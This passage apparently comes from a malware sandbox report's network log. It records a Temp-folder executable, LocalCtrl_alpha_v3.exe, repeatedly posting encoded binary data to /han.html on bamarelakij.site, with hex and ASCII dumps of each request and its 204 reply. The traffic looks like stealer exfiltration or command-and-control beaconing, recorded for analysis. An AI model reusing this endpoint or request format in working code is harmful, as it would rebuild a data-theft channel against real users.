                                                                                                                                                            Data Ascii: c-(RHT<$v0H?la88UOFGv=W$REz)Wb.eP<\IjGBK&!|e!j>awdtaw:Xl9V?>KkDBE1zC{=B8taO:X\i9VP[N513z]XC&;K
                                                                                                                                                            2025-01-06 22:05:14 UTC15331OUTData Raw: b6 b1 3c 4e 89 a3 1f 60 96 59 e1 d6 64 db 5c a2 2b 96 16 22 f7 75 4e 74 86 df 68 d5 6c 34 c9 b6 35 c9 b6 5b 27 fb 7d de 8f 3d 99 49 05 a0 cc d9 e6 3b a4 12 06 ed e7 f7 0b c3 61 b5 f6 49 27 df 89 37 1f 2c dd a5 1d c8 8f a7 98 5d b5 c7 ef c4 db 6b 67 73 7d f0 c2 1f ff de a9 8c 18 84 6a d3 18 6e 93 c6 5b bd 4d 02 a7 b1 e9 9f 61 6f bc 49 74 34 5f 33 d2 d9 33 f1 4b b7 8f 26 21 62 98 4c a4 26 ee 8f 70 8c f9 e6 b0 e2 bf 6b 9e 37 92 96 3b 1b eb 87 95 51 a0 82 9b 49 45 10 d9 f1 d8 2a 84 a3 da 5f a7 a6 ec 27 2d 37 0e f5 1f d0 53 36 e3 26 ed 42 5b 6d a8 8f a7 6c 3f 72 f5 07 95 17 b3 03 88 11 16 de 37 29 cd 1c 41 19 a3 7a 6f f5 cc 7c ea 5f ea 99 1c 16 90 42 63 23 8a 2a 7c c3 d8 9f 8f a9 23 c7 23 ca 6c 39 87 00 60 18 68 8c cf 20 f3 ea 69 6d 3c d4 28 16 ca 45 e2 21 58
                                                                                                                                                            Data Ascii: <N`Yd\+"uNthl45['}=I;aI'7,]kgs}jn[MaoIt4_33K&!bL&pk7;QIE*_'-7S6&B[ml?r7)Azo|_Bc#*|##l9`h im<(E!X
                                                                                                                                                            2025-01-06 22:05:14 UTC15331OUTData Raw: 90 6d cb e5 0a d3 3f 74 45 47 70 c9 10 2d e9 4b d6 ed 8b cd 0b df 3b 5a 4b eb 75 4f b7 3e a6 fa e6 c1 cb 6d 53 da 5f 37 3e 39 98 ed 7f c8 06 9d 61 f1 92 ee d9 28 fd 33 f8 ca 14 5a d6 5e 0e b4 bd 42 8e 5d 96 52 6d d0 17 f5 a6 2d 9e d5 79 e1 20 f6 4a 94 bd 4e e4 e3 75 f8 81 89 9e 5e 6d 83 c5 a6 95 2e 9f 5a de 85 b5 54 9a 3d d0 3f bc 7a 6b b8 f6 fa 53 ba bb f8 68 c9 14 e4 7b 5c 8b b5 ec 07 92 a5 83 7a 9a e9 2d 2e 1a 0f 3f 4c de 42 a1 be 1f be d4 7c 19 86 da ca 8b 53 91 a1 cf 1d 21 fa 43 bb c2 05 fa 4a e5 91 13 aa 19 45 b7 9b 08 25 57 09 8c 74 49 10 f8 db dc 52 b0 c3 19 9b f8 43 a0 87 ed 7b 18 15 ed 18 b8 62 9d 51 b6 c3 29 3a 93 e0 6e 63 4d fc fc e7 f8 07 b6 ee b6 9a d6 77 35 ec 92 69 31 f3 e2 fc 1f 28 57 dd 6c ff 30 e0 5a 2b ab c6 c1 ea 3e 76 5f 4e b2 dc 73
                                                                                                                                                            Data Ascii: m?tEGp-K;ZKuO>mS_7>9a(3Z^B]Rm-y JNu^m.ZT=?zkSh{\z-.?LB|S!CJE%WtIRC{bQ):ncMw5i1(Wl0Z+>v_Ns
                                                                                                                                                            2025-01-06 22:05:14 UTC11810OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cf d0 db 28 a5 81 02 96 00 00 04 04 00 ec 0a 1c ab fa d2 78 e9 ff ff ff ff ff ff ff ff 9f 00 0a 00 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 2e 23 b4 39 b2 33 b7 3c 2e 38 39 b7 33 b4 36 b2 b9 2e 33 b8 b9 9c 19 b7 1a 38 17 32 b2 33 b0 ba 36 3a 96 39 b2 36 b2 b0 b9 b2 2e 28 36 b0 b1 b2 b9 80 00 08 00 00 00 28 00 00 00 00 00 2e 15 00 00 00 00 00 00 76 ee b5 46 2e eb b0 0c 7f b9 b3 33 b3 3b 2b 52 62 64 29 6b 45 91 b5 34 bc a6 57 fc 09 dc 51 24 ac c8 8a 35 dc 52 0c a4 4a 62 c3 12 7d c7 30 18 dd b9 bb bb 62 bc 16 f3 e0 ab 12 2f 57 75 0b 57 89 0a b4 0d 12 34 81 5a 14 68 83 28 52 7f 49 1c 9a 4e 0c b6 30 5a 20 41 2b a4 91 02 43 89 6a 3b 7f 23 30 91 da 8d ea bc 2c 24 46 53 60 66 1f 77
                                                                                                                                                            Data Ascii: (x199.#93<.8936.38236:96.(6(.vF.3;+Rbd)kE4WQ$5RJb}0b/WuW4Zh(RIN0Z A+Cj;#0,$FS`fw
                                                                                                                                                            2025-01-06 22:05:15 UTC832INHTTP/1.1 204 No Content
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:15 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ymv821duIS%2F1a7h1xaJpqa1J2aFMG0aovw1ku4jCIXrlq0XBUfynOpik4onwSw4j4FwN3GzqzaYGxVYkiCg%2FaJm3%2FFwh1Xhq%2BKwKdz5GutXwnuDBjHIbEXWzENeytTUN3HED"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf02250c8c4237-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1806&rtt_var=685&sent=50&recv=112&lost=0&retrans=0&sent_bytes=2838&recv_bytes=105177&delivery_rate=1586956&cwnd=194&unsent_bytes=0&cid=0d22e92178a60d03&ts=898&x=0"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            18192.168.2.449919104.21.80.524434176C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:15 UTC456OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            Content-Length: 745
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:05:15 UTC745OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 8c 8e 68 35 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff a7 00 00 00 08 00 00 00 52 00 00 00 b6 ea 41 13 95 a7 40 16 d7 35 c9 59 8a 00 00 00 00 00 00 00 00 00 00 00 5b 75 a0 89 49 60 49 ca 60 01 80 d1 49 60 00 50 ca 60 80 80 d1 49 60 00 50 31 00
                                                                                                                                                            Data Ascii: Rh5@5YFG4I`H1FG4(((RA@5Y[uI`I`I`P`I`P1
                                                                                                                                                            2025-01-06 22:05:15 UTC831INHTTP/1.1 204 No Content
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:15 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wAejjH3jVGyUVrA6RYR%2BmYJm%2F5yCrYKdkkA8%2Fl74xWB%2FimQCfX%2BDWAIzlc13IrlHY5pj8gJggEIQ6sKd6HkfNnKOmihh32rb2PGSvQuaf%2FRCEG8NZgzwWdMTbACdtwdMzm8R"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf022d1faf4394-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1582&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1837&delivery_rate=1796923&cwnd=168&unsent_bytes=0&cid=dc6c3262e65a69fe&ts=346&x=0"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            19192.168.2.449929104.21.80.524434176C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:16 UTC456OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            Content-Length: 212
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:05:16 UTC212OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 99 00 00 00 08 00 00 00 52 00 00 00 6f d2 a9 18 95 a7 40 16 d7 35 c9 59 83 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c c9 60 60 49 60 c8 00 31 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                            Data Ascii: Ro@5Yi``I`1i(((
                                                                                                                                                            2025-01-06 22:05:16 UTC819INHTTP/1.1 204 No Content
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:16 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bS5UtIfRQaDmk1DcjVCuZpp0YuUz00CQ48rvUL5IaoAAcFOjyP2h9r58tfTKeHNlS4szbg5e3tgyrDhYnlWBXVI6pNrkyfOW3p1qwA2kKLFd08QqnFxeaYwchcveqEcQh2Cz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf02329aa5236a-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2628&min_rtt=2628&rtt_var=1314&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4214&recv_bytes=1304&delivery_rate=153643&cwnd=170&unsent_bytes=0&cid=82efe8ca282aad03&ts=329&x=0"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            20192.168.2.449938104.21.80.524434176C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:17 UTC456OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            Content-Length: 380
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:05:17 UTC380OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 f5 31 4e 30 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 94 00 00 00 08 00 00 00 52 00 00 00 8e 36 1e 13 95 a7 40 16 d7 35 c9 59 01 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 c8 48 31 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 28 a5 03 03 16
                                                                                                                                                            Data Ascii: R1N0@5Y'I`H1'(((R6@5YGH1G(
                                                                                                                                                            2025-01-06 22:05:17 UTC828INHTTP/1.1 204 No Content
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:17 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=55eWPcJUjsbrOTbdYj3LPxXifWpOlf6f7Ubj1ZTUSkL3GdYm71%2BC9l7lz1mZQbGI0S3Fprm7pH%2FK2tj8t9HOn9uNOZ3jY%2F9jmLNs5zyJVNb9OCrUEnon%2BlZ7DmJTx48nyeqq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf02382d0cc40c-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5586&min_rtt=1815&rtt_var=3101&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1472&delivery_rate=1608815&cwnd=221&unsent_bytes=0&cid=99577d1e8536181c&ts=329&x=0"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            21192.168.2.449946104.21.80.524434176C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:18 UTC458OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            Content-Length: 58769
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:05:18 UTC15331OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 56 e5 00 00 08 00 00 00 52 00 00 00 3a eb 68 36 95 a7 40 16 d7 35 c9 59 02 00 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b c9 60 00 48 11 f2 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b 28 a5 81 02 96 00 00 04 04 00 ec 0a 1c ab 7b 15 ee a6 ff ff ff ff ff ff ff ff 8d 00 0a 00 a3 39 b0 31 31 b2 39 2e 32 b2 b9 2e 22 2a 21 2d a3 a4 a7 a7 a9 a7 17 32 b7 b1 3c 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd 22 2a 21 2d a3 a4 a7 a7 a9 a7 a3 a4 2c a1 21 a6 a3 2d 2d 2a ab a6 21 a8 2c a3 24 a4 21 22 a4 22 21 27 a1 a0 a1 23 22 23 2b 21 a7 2c 2a 22 aa aa 25 a6 aa a6 21 a0 a5 2d a9 24 23 a2 a4 ab 27 a8 24 a2 a2 a1 ac 2b 2a 2b 2a a9 a7 2a a7 29 27 a8 a4 28 a4 22 a0 29 a6 a1 a8 22 28 a8 a0 23
                                                                                                                                                            Data Ascii: VR:h6@5Y4`H4({9119.2."*!-2<"*!-,!--*!,$!""!'#"#+!,*"%!-$#'$+*+**)'(")"(#
                                                                                                                                                            2025-01-06 22:05:18 UTC15331OUTData Raw: 22 a4 ab 23 a2 a6 a4 a9 a2 a5 2d ab 27 a1 22 2a a4 28 2a 2a a7 2d 2c a7 2d 25 a4 ac a6 a3 a5 ac a4 a5 2c 21 26 aa 29 2b ab 21 25 24 ac 23 25 a1 26 a3 2b 2b a4 a6 a0 22 aa 26 2a 2a 2b 2d a4 a7 a2 a4 28 a6 2b 25 a0 a7 28 a9 a8 a1 22 23 a6 ac 28 a9 28 a3 26 21 a4 a8 2c 2a ab 2a aa 2d a2 29 a3 21 22 2a a1 a4 29 29 2b 29 2a 27 a3 a2 27 2c 2c 29 2a 24 a2 a9 2c a8 23 aa a8 a9 29 a3 aa a8 22 a8 ab a3 2a a3 2c 2a a9 a3 22 ac ab a4 a8 2b a7 a5 a0 21 a0 a4 a0 25 a4 a2 aa 2b ac a1 2d 2c 27 ac 2b a5 28 29 29 a2 a6 ac a0 2b 22 23 22 24 ab a7 a3 a2 a5 a0 26 aa 28 21 24 a7 24 a2 27 a4 24 26 23 25 2d a0 24 2b 2a 25 a4 a8 25 21 a5 2c a7 ac a4 a7 a2 26 a1 a4 a4 a2 a1 25 21 28 2a 2a a0 a9 21 a2 a5 a3 a7 a2 a9 29 22 23 21 a0 a1 28 a7 2a 27 a6 29 2d a7 a3 ab 27 28 27 29 a7 a3
                                                                                                                                                            Data Ascii: "#-'"*(**-,-%,!&)+!%$#%&++"&**+-(+%("#((&!,**-)!"*))+)*'',,)*$,#)"*,*"+!%+-,'+())+"#"$&(!$$'$&#%-$+*%%!,&%!(**!)"#!(*')-'(')
                                                                                                                                                            2025-01-06 22:05:18 UTC15331OUTData Raw: a9 23 a6 a4 24 23 2d 24 a4 22 28 a3 26 a7 2a 24 a1 a8 23 2d 2d a2 24 a4 a2 2c ab 27 27 2d 29 25 a8 26 ab ac a6 2b aa 24 2a 2c 24 23 23 22 2a ac 21 24 22 29 21 29 27 2a 28 26 21 2c 28 2b 23 a1 aa 2b a0 25 a7 ac a7 ab 29 a2 27 23 aa 2c 2a a9 a1 27 a1 a1 a8 25 a7 a9 a4 2a a1 23 2a a3 25 24 23 a8 a1 ac a4 a9 a5 aa a0 2b a9 29 ac a0 a9 ab 2b 25 29 22 27 a7 ac ac a1 a9 ac a7 2d ab 24 29 28 27 a9 21 ab a6 24 aa aa a2 ac aa a3 a7 2c 2b a9 ac a5 26 23 2d a0 aa a8 25 2d 22 2b 21 a2 21 24 24 a3 2c a8 24 2d 2b 25 ab 27 aa a3 26 a9 a0 ac ab a4 a2 24 a0 25 a1 28 a4 a7 24 a7 28 a1 2c a5 27 2b 29 a4 a9 21 a3 aa a0 a2 a6 a9 ac a2 a3 27 28 a8 2c a4 2a 29 a4 a4 a6 2c a7 26 a4 25 ac aa 21 a4 a2 a8 a3 2d a8 aa a0 24 29 ab a6 a5 a8 24 a1 29 24 a5 21 25 2d a8 a8 2c 23 ac 2a 27
                                                                                                                                                            Data Ascii: #$#-$"(&*$#--$,''-)%&+$*,$##"*!$")!)'*(&!,(+#+%)'#,*'%*#*%$#+)+%)"'-$)('!$,+&#-%-"+!!$$,$-+%'&$%($(,'+)!'(,*),&%!-$)$)$!%-,#*'
                                                                                                                                                            2025-01-06 22:05:18 UTC12776OUTData Raw: a8 a8 27 a1 a2 a6 a0 a2 22 aa 26 2a 2a a9 22 a4 a3 22 a3 a2 ac a1 23 a9 24 a7 ac 23 a6 22 29 2a 24 a1 25 a5 a1 23 a2 23 26 a6 26 2b 25 27 24 aa 2a a4 a9 22 2a ac ac a5 a8 2c 2b ac a2 26 29 2c 2a a1 28 2b a6 2a 24 a3 a6 2c a9 22 a6 aa a9 23 a2 28 a4 a4 23 21 24 a1 29 29 a1 a3 ab 2c 27 ab a2 2c a8 a3 a4 aa aa a0 ac 21 26 a1 a4 21 2d a3 a1 2c 2c 2d ac ac 23 28 a7 a4 a0 aa aa a0 2d a2 a7 29 a4 27 21 21 2a a7 2d a2 aa 2c a6 a0 2d ac 23 2b 22 ab a3 26 2d 2d 24 a7 24 27 2d 24 a9 a2 25 ac 2d aa 26 29 27 a3 a0 23 a5 22 a8 2c a2 ac 24 a6 25 ab a0 2d 2c a1 2a a9 26 a7 a4 22 a9 2b ab a1 22 22 a0 25 2b a8 a7 2d 29 2c ab 2b ab a1 a6 ac a8 a1 a5 2c 29 a8 a6 a7 24 2b a1 a6 25 24 2c a2 29 a8 2a a6 21 a3 29 a2 2a 24 a5 21 a4 a8 aa 26 a0 28 25 2b a0 21 22 a3 a6 25 22 aa 26
                                                                                                                                                            Data Ascii: '"&**""#$#")*$%##&&+%'$*"*,+&),*(+*$,"#(#!$)),',!&!-,,-#(-)'!!*-,-#+"&--$$'-$%-&)'#",$%-,*&"+""%+-),+,)$+%$,)*!)*$!&(%+!"%"&
                                                                                                                                                            2025-01-06 22:05:18 UTC826INHTTP/1.1 204 No Content
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:18 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BMGdiagpUqYCv2dcuyVAa8Y9USG1yLrxyOLHSyFqyahu1eHZPhQZpvb8xPMpwi35LVLjihWEMbMvv9B2WHfHsFlJlXhM33Kb6k5%2B0aLfqQyvM81zHX6BBbh6Wp0yIBa%2FrKCc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf023d2ade443e-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1604&rtt_var=737&sent=24&recv=65&lost=0&retrans=0&sent_bytes=2838&recv_bytes=60017&delivery_rate=1358771&cwnd=195&unsent_bytes=0&cid=45cec2bb3519399d&ts=581&x=0"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            22192.168.2.449953104.21.80.524434176C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:19 UTC458OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            Content-Length: 69740
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:05:19 UTC15331OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 31 10 01 00 08 00 00 00 52 00 00 00 c2 21 66 25 95 a7 40 16 d7 35 c9 59 8b 87 00 00 00 00 00 00 00 00 00 00 61 90 33 92 cd 60 53 19 1c 1a 9c 9c 19 d2 35 b7 37 b2 b9 c9 05 00 e6 25 b2 c8 49 e6 82 00 e6 02 00 e7 00 00 00 80 ff 7a 00 00 ec 13 a4 37 3a b2 36 14 29 94 10 a1 b7 39 b2 14 2a a6 94 19 10 a1 28 aa 10 1b 1b 18 18 10 20 10 19 17 1a 18 10 a3 24 3d c8 df a6 b4 b1 39 b7 b9 b7 33 3a 10 21 b0 b9 b4 b1 10 22 b4 b9 38 36 b0 bc 10 a0 32 b0 38 3a b2 39 60 e1 6e 00 e0 50 53 a9 bc b9 3a b2 b6 54 29 b2 b3 b4 b9 3a 39 bc 54 b9 b6 b9 b9 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 d5 bb b4 37 b4 37 b4 3a 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 56 bb b4 37 36 b7 b3 b7 37 17 b2 3c b2 56 b9 b2 39 3b b4 b1 b2 b9
                                                                                                                                                            Data Ascii: 1R!f%@5Ya3`S57%Iz7:6)9*( $=93:!"8628:9`nPS:T):9T<9<77:<9<V767<V9;
